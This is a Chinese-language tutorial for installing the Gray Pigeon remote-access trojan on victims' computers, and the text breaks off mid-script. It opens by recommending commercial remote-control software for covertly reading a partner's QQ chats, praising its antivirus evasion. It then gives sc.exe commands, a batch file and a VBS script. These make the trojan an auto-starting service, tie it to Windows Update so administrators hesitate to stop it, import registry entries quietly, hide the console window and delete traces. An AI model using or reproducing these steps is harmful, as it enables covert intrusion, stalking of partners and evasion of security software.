灰鸽子使用教程+ 网络人远程控制软件教程(图解) 写在前面:现在灰鸽子是越来越困难了,查杀太严重,新手基本上很难捉到鸡,建议如果只是想监控男女朋友QQ 聊天记录的新手,直接购买网络人远程控制软件软件,非常好用的一款监控软件,免杀做得很好,鸽子其实不是免费的,空间也是收费的。没必要浪费时间) 灰鸽子教程 准备工具: 鸽子服务端 IcoSprite 图标更改器; SC.exe 服务添加删除更改工具; winrar 程序特点: 自解压形式,双击即可 制作过程: 1. 首先自己配置一下鸽子服务端,配置时[启动项设置]这里面的都不要填,不要写入注册表,也不要用服务启动。其他的随你个人爱好。 2.用SC 创建一个服务 运行CMD.EXE 在system32 的目录下运行执行 SC.exe create huigezi BinPath= "%systemroot%\system32\gezi.exe" type=own type= interact start= auto DisplayName= "gezi" ‘ 这 句 是 用SC建 立 一 个 服 务 , 服 务 名 为huigezi , 路 径Binpath为"%systemroot%\system32\gezi.exe",类型 type 为 own 与 interact 交互,启动类型 start 为自动,显示名 DisplayName 为"gezi"。 sc.exe descript_ion huigezi "不死鸽子" ‘这句是将 huigezi 服务的描述改为“不死鸽子” sc config wuauserv depend= huigezi ‘配置 huigezi 使 wuauserv 服务依存此服务(wuauserv 可以根据自己喜欢改成其它服务,这里的wuauserv 是系统在Windows Update 网站的自动更新服务)。 这里的目的是迷惑管理员,使其不敢轻易停止我们生成的服务,自己也可以多加点。 3.将这些从注册表导出,我个人经验是:瑞星,咔吧等的注册表监控不会对导入注册表报警. 我们将他命名为 1.reg 4.创建一个 BAT 文件,并命名为 update.bat @regedit /s %systemroot%\system32\1.reg @%systemroot%\system32\gezi.exe @del /q /f /s %systemroot%\system32\1.reg @del /q /f /s %systemroot%\system32\Update.vbs @del /q /f /s %systemroot%\system32\Update.bat 5.创建一个vbs 并命名为update.vbs 目的是为了作用是令bat 里的内容以安静模式执行,这样就可以让cmd 窗口跳出来了,增加了不少隐蔽性。 里面写上如下代码: On Error Resume Next set wshshell=createobject ("wscript_.shell") a=wshshell.run ("cmd.exe /C %systemroot%\system32\Up...